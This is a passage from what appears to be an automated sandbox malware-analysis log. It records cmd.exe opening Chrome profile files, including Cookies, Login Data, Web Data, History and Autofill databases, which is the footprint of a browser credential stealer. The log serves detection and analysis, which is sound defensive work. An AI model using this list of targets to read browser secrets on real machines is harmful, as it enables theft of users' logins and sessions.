Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\MANIFEST-000001Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\000003.logJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action PredictorJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\000003.logJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Current TabsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Media History-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.logJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db-journalJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\33d102032f141cd7_0Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NELJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Media HistoryJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal